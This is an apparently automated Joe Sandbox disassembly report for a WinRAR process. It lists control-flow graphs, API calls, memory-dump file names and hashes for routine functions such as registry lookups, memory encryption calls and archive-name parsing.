                                                                                                                                                                                                                                control_flow_graph 1405 7ff6faa34fd0-7ff6faa3502d call 7ff6faa7a5a0 1408 7ff6faa3504d-7ff6faa35055 1405->1408 1409 7ff6faa3502f-7ff6faa35037 1405->1409 1411 7ff6faa35057-7ff6faa35069 call 7ff6faa3481c 1408->1411 1412 7ff6faa3506e-7ff6faa35089 call 7ff6faa5420c 1408->1412 1409->1408 1410 7ff6faa35039-7ff6faa3504b call 7ff6faa7c8a0 1409->1410 1410->1408 1410->1411 1411->1412 1418 7ff6faa3508b-7ff6faa3509d call 7ff6faa6a9c0 1412->1418 1419 7ff6faa3509f-7ff6faa350b6 call 7ff6faa6db08 1412->1419 1424 7ff6faa3511b-7ff6faa35131 call 7ff6faa7c8a0 1418->1424 1419->1424 1425 7ff6faa350b8-7ff6faa350c3 call 7ff6faa6a59c 1419->1425 1430 7ff6faa35137-7ff6faa3513e 1424->1430 1431 7ff6faa35203-7ff6faa3520d call 7ff6faa6aa48 1424->1431 1425->1424 1432 7ff6faa350c5-7ff6faa350cf call 7ff6faa43054 1425->1432 1433 7ff6faa3516c-7ff6faa351be call 7ff6faa6aa1c call 7ff6faa6aa48 call 7ff6faa66e98 1430->1433 1434 7ff6faa35140-7ff6faa35167 call 7ff6faa53f98 1430->1434 1440 7ff6faa35212-7ff6faa3521c 1431->1440 1432->1424 1441 7ff6faa350d1-7ff6faa35107 call 7ff6faa6a9e8 call 7ff6faa6a9c0 call 7ff6faa43054 1432->1441 1483 7ff6faa351d3-7ff6faa351e8 call 7ff6faa67a24 1433->1483 1434->1433 1443 7ff6faa352db-7ff6faa352e0 1440->1443 1444 7ff6faa35222 1440->1444 1441->1424 1522 7ff6faa35109-7ff6faa35116 call 7ff6faa6a9e8 1441->1522 1445 7ff6faa352e6-7ff6faa352e9 1443->1445 1446 7ff6faa35453-7ff6faa35477 call 7ff6faa3f00c call 7ff6faa3f230 call 7ff6faa3f09c 1443->1446 1449 7ff6faa35228-7ff6faa3522d 1444->1449 1450 7ff6faa3532f-7ff6faa35332 1444->1450 1454 7ff6faa35379-7ff6faa35382 1445->1454 1455 7ff6faa352ef-7ff6faa352f2 1445->1455 1501 7ff6faa3547c-7ff6faa35483 1446->1501 1449->1450 1458 7ff6faa35233-7ff6faa35236 1449->1458 1452 7ff6faa3533b-7ff6faa3533e 1450->1452 1453 7ff6faa35334 1450->1453 1464 7ff6faa35347-7ff6faa35358 call 7ff6faa21230 call 7ff6faa24858 1452->1464 1465 7ff6faa35340 1452->1465 1453->1452 1462 7ff6faa35388-7ff6faa3538b 1454->1462 1463 7ff6faa35449-7ff6faa35451 call 7ff6faa5eab8 1454->1463 1466 7ff6faa3536c-7ff6faa35374 call 7ff6faa681cc 1455->1466 1467 7ff6faa352f4-7ff6faa352f7 1455->1467 1459 7ff6faa35238-7ff6faa3523b 1458->1459 1460 7ff6faa35290-7ff6faa35299 1458->1460 1470 7ff6faa3523d-7ff6faa35240 1459->1470 1471 7ff6faa35274-7ff6faa3528b call 7ff6faa21230 call 7ff6faa248ec 1459->1471 1479 7ff6faa3529b-7ff6faa3529e 1460->1479 1480 7ff6faa352b2-7ff6faa352bd 1460->1480 1475 7ff6faa3541b-7ff6faa35433 call 7ff6faa6ab1c 1462->1475 1476 7ff6faa35391-7ff6faa35397 1462->1476 1463->1501 1530 7ff6faa3535d 1464->1530 1465->1464 1466->1501 1467->1446 1478 7ff6faa352fd-7ff6faa35300 1467->1478 1470->1446 1493 7ff6faa35246-7ff6faa35249 1470->1493 1532 7ff6faa3535e-7ff6faa35362 call 7ff6faa214fc 1471->1532 1475->1501 1529 7ff6faa35435-7ff6faa35447 call 7ff6faa5bbd4 1475->1529 1489 7ff6faa35399-7ff6faa3539c 1476->1489 1490 7ff6faa3540c-7ff6faa35419 call 7ff6faa554f8 call 7ff6faa551e4 1476->1490 1478->1450 1491 7ff6faa35302-7ff6faa35305 1478->1491 1485 7ff6faa352ce-7ff6faa352d6 call 7ff6faa555e0 1479->1485 1497 7ff6faa352a0-7ff6faa352a6 1479->1497 1480->1485 1486 7ff6faa352bf-7ff6faa352c9 call 7ff6faa6a9e8 1480->1486 1534 7ff6faa351ea-7ff6faa35201 call 7ff6faa66f68 call 7ff6faa214c0 1483->1534 1535 7ff6faa351c0-7ff6faa351ce call 7ff6faa6aa48 1483->1535 1485->1501 1486->1485 1505 7ff6faa3539e-7ff6faa353a1 1489->1505 1506 7ff6faa353ef-7ff6faa35401 call 7ff6faa345c8 1489->1506 1490->1501 1507 7ff6faa35307-7ff6faa3530a 1491->1507 1508 7ff6faa35322-7ff6faa3532a call 7ff6faa467e0 1491->1508 1493->1450 1510 7ff6faa3524f-7ff6faa35252 1493->1510 1498 7ff6faa352a8-7ff6faa352ad call 7ff6faa37214 1497->1498 1499 7ff6faa35313-7ff6faa3531d call 7ff6faa3481c 1497->1499 1498->1501 1499->1501 1519 7ff6faa35491-7ff6faa354bc call 7ff6faa7a610 1501->1519 1520 7ff6faa35485-7ff6faa3548c call 7ff6faa38444 1501->1520 1505->1499 1518 7ff6faa353a7-7ff6faa353d5 call 7ff6faa345c8 call 7ff6faa6ab1c 1505->1518 1506->1490 1507->1446 1521 7ff6faa35310 1507->1521 1508->1501 1510->1446 1525 7ff6faa35258-7ff6faa3525b 1510->1525 1518->1501 1561 7ff6faa353db-7ff6faa353ea call 7ff6faa5ba9c 1518->1561 1520->1519 1521->1499 1522->1424 1542 7ff6faa3525d-7ff6faa35260 1525->1542 1543 7ff6faa3526b-7ff6faa35272 1525->1543 1529->1501 1530->1532 1555 7ff6faa35367 1532->1555 1534->1440 1535->1483 1542->1508 1553 7ff6faa35266 1542->1553 1543->1485 1553->1521 1555->1501 1561->1501
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: wcschr
                                                                                                                                                                                                                                • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                • Instruction ID: b99889502454f512b3e7ee31c3a3e3a5ea5264d9b2d73083dc49dc29d5b65b2d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCC1A961A1C78358EB65AF29C4521FC1355EF46784F4441B1DABECA6DAFE2EE60BC300
                                                                                                                                                                                                                                Function 00007FF6FAA67F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1564 7ff6faa67f24-7ff6faa67f5c 1565 7ff6faa67f5e-7ff6faa67f64 1564->1565 1566 7ff6faa67fd0 1564->1566 1565->1566 1568 7ff6faa67f66-7ff6faa67f7c call 7ff6faa6b3f0 1565->1568 1567 7ff6faa67fd7-7ff6faa67fea 1566->1567 1569 7ff6faa67fec-7ff6faa67fef 1567->1569 1570 7ff6faa68036-7ff6faa68039 1567->1570 1578 7ff6faa67fb5 1568->1578 1579 7ff6faa67f7e-7ff6faa67fb3 GetProcAddressForCaller GetProcAddress 1568->1579 1573 7ff6faa6805c-7ff6faa68065 GetCurrentProcessId 1569->1573 1574 7ff6faa67ff1-7ff6faa68000 1569->1574 1572 7ff6faa6803b-7ff6faa6804a 1570->1572 1570->1573 1584 7ff6faa6804f-7ff6faa68051 1572->1584 1576 7ff6faa68077-7ff6faa68093 1573->1576 1577 7ff6faa68067 1573->1577 1585 7ff6faa68005-7ff6faa68007 1574->1585 1583 7ff6faa68069-7ff6faa68075 1577->1583 1580 7ff6faa67fbc-7ff6faa67fce 1578->1580 1579->1580 1580->1567 1583->1576 1583->1583 1584->1576 1586 7ff6faa68053-7ff6faa6805a 1584->1586 1585->1576 1587 7ff6faa68009 1585->1587 1588 7ff6faa68010-7ff6faa68034 call 7ff6faa3ca6c call 7ff6faa3cda4 call 7ff6faa3ca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                • Instruction ID: 69c7c7a44517c66247d8e42866342d95f5a045ab72b89ebc59f63a7d976f539d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81417820B08B8281FB42CB1AA90087567A1AF4ABD4F0911B1CC7D877E8FF7DE05B8700
                                                                                                                                                                                                                                Function 00007FF6FAA7B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 552178382-0
                                                                                                                                                                                                                                • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                • Instruction ID: be9e56524e6ea4d9ff608b3cae04fe54619bd2d9bbef5e3a56f6ca747208dbce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC314F71E0D28346FB14AB25E5113BA1391AF45784F4454B8EA6EC76DBFE2DE80F8350
                                                                                                                                                                                                                                Function 00007FF6FAA64774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA647DB
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA64831
                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA64853
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA648A6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                • Instruction ID: fecb0417baeee7dc7733a39b8c233f4f2a9a2bce7c8833df49e67ea4eb222fe8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D931D022728A8145EB60DB25E8002BA6361FF897D4F401271EE6D87BD9FF6CD14ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA54398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA543D1
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA54402
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA5440D
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA5443E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                • Instruction ID: ca4801e8609480b4d5f209b227fb044d02645f31fd1b70e871a7a79d6e8d519c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12117F22A18B4286EB909F26F5005A97361FF88BC4F445171EE6E87BD9EF3DD01AC704
                                                                                                                                                                                                                                Function 00007FF6FAA27A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1715 7ff6faa27a5b-7ff6faa27a5e 1716 7ff6faa27a68 1715->1716 1717 7ff6faa27a60-7ff6faa27a66 1715->1717 1718 7ff6faa27a6b-7ff6faa27a7c 1716->1718 1717->1716 1717->1718 1719 7ff6faa27aa8 1718->1719 1720 7ff6faa27a7e-7ff6faa27a81 1718->1720 1723 7ff6faa27aab-7ff6faa27ab8 1719->1723 1721 7ff6faa27a88-7ff6faa27a8b 1720->1721 1722 7ff6faa27a83-7ff6faa27a86 1720->1722 1724 7ff6faa27a8d-7ff6faa27a90 1721->1724 1725 7ff6faa27aa4-7ff6faa27aa6 1721->1725 1722->1719 1722->1721 1726 7ff6faa27ac8-7ff6faa27acb 1723->1726 1727 7ff6faa27aba-7ff6faa27abd 1723->1727 1724->1719 1728 7ff6faa27a92-7ff6faa27a99 1724->1728 1725->1723 1730 7ff6faa27acf-7ff6faa27ad1 1726->1730 1727->1726 1729 7ff6faa27abf-7ff6faa27ac6 1727->1729 1728->1725 1731 7ff6faa27a9b-7ff6faa27aa2 1728->1731 1729->1730 1732 7ff6faa27b2a-7ff6faa27bb0 call 7ff6faa41d34 call 7ff6faa23f04 1730->1732 1733 7ff6faa27ad3-7ff6faa27ae6 1730->1733 1731->1719 1731->1725 1744 7ff6faa27bbc 1732->1744 1745 7ff6faa27bb2-7ff6faa27bba 1732->1745 1735 7ff6faa27ae8-7ff6faa27af2 call 7ff6faa39be0 1733->1735 1736 7ff6faa27b0a-7ff6faa27b27 1733->1736 1739 7ff6faa27af7-7ff6faa27b02 1735->1739 1736->1732 1739->1736 1746 7ff6faa27bbf-7ff6faa27bc9 1744->1746 1745->1744 1745->1746 1747 7ff6faa27bcb-7ff6faa27bd5 call 7ff6faa41e1c 1746->1747 1748 7ff6faa27bda-7ff6faa27c06 call 7ff6faa2b540 1746->1748 1747->1748 1752 7ff6faa27c08-7ff6faa27c0f 1748->1752 1753 7ff6faa27c40 1748->1753 1752->1753 1754 7ff6faa27c11-7ff6faa27c14 1752->1754 1755 7ff6faa27c44-7ff6faa27c5a call 7ff6faa2aa68 1753->1755 1754->1753 1756 7ff6faa27c16-7ff6faa27c2b 1754->1756 1761 7ff6faa27c5c-7ff6faa27c6a 1755->1761 1762 7ff6faa27c85-7ff6faa27c97 call 7ff6faa2b540 1755->1762 1756->1755 1758 7ff6faa27c2d-7ff6faa27c3e call 7ff6faa79b98 1756->1758 1758->1755 1761->1762 1765 7ff6faa27c6c-7ff6faa27c7e call 7ff6faa28d98 1761->1765 1766 7ff6faa27c9c-7ff6faa27c9f 1762->1766 1765->1762 1768 7ff6faa27ca5-7ff6faa27cfb call 7ff6faa59354 call 7ff6faa46378 * 2 1766->1768 1769 7ff6faa27fa4-7ff6faa27fbe 1766->1769 1777 7ff6faa27d17-7ff6faa27d1f 1768->1777 1778 7ff6faa27cfd-7ff6faa27d10 call 7ff6faa25414 1768->1778 1780 7ff6faa27de2-7ff6faa27de6 1777->1780 1781 7ff6faa27d25-7ff6faa27d28 1777->1781 1778->1777 1783 7ff6faa27de8-7ff6faa27e49 call 7ff6faa598dc 1780->1783 1784 7ff6faa27e4e-7ff6faa27e68 call 7ff6faa59958 1780->1784 1781->1780 1785 7ff6faa27d2e-7ff6faa27d36 1781->1785 1783->1784 1793 7ff6faa27e8b-7ff6faa27e8e 1784->1793 1794 7ff6faa27e6a-7ff6faa27e84 1784->1794 1786 7ff6faa27d59-7ff6faa27d6a call 7ff6faa7a444 1785->1786 1787 7ff6faa27d38-7ff6faa27d49 call 7ff6faa7a444 1785->1787 1801 7ff6faa27d78-7ff6faa27dc6 1786->1801 1802 7ff6faa27d6c-7ff6faa27d77 call 7ff6faa4cf8c 1786->1802 1799 7ff6faa27d57 1787->1799 1800 7ff6faa27d4b-7ff6faa27d56 call 7ff6faa48ae8 1787->1800 1797 7ff6faa27e9f-7ff6faa27eb8 call 7ff6faa21204 1793->1797 1798 7ff6faa27e90-7ff6faa27e9a call 7ff6faa59990 1793->1798 1794->1793 1813 7ff6faa27ec8-7ff6faa27ed9 call 7ff6faa5941c 1797->1813 1798->1797 1799->1801 1800->1799 1801->1780 1823 7ff6faa27dc8-7ff6faa27de1 call 7ff6faa21314 call 7ff6faa7ba34 1801->1823 1802->1801 1817 7ff6faa27edb-7ff6faa27f9f call 7ff6faa21400 call 7ff6faa46424 call 7ff6faa2b540 1813->1817 1818 7ff6faa27eba-7ff6faa27ec3 call 7ff6faa59680 1813->1818 1817->1769 1818->1813 1823->1780
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
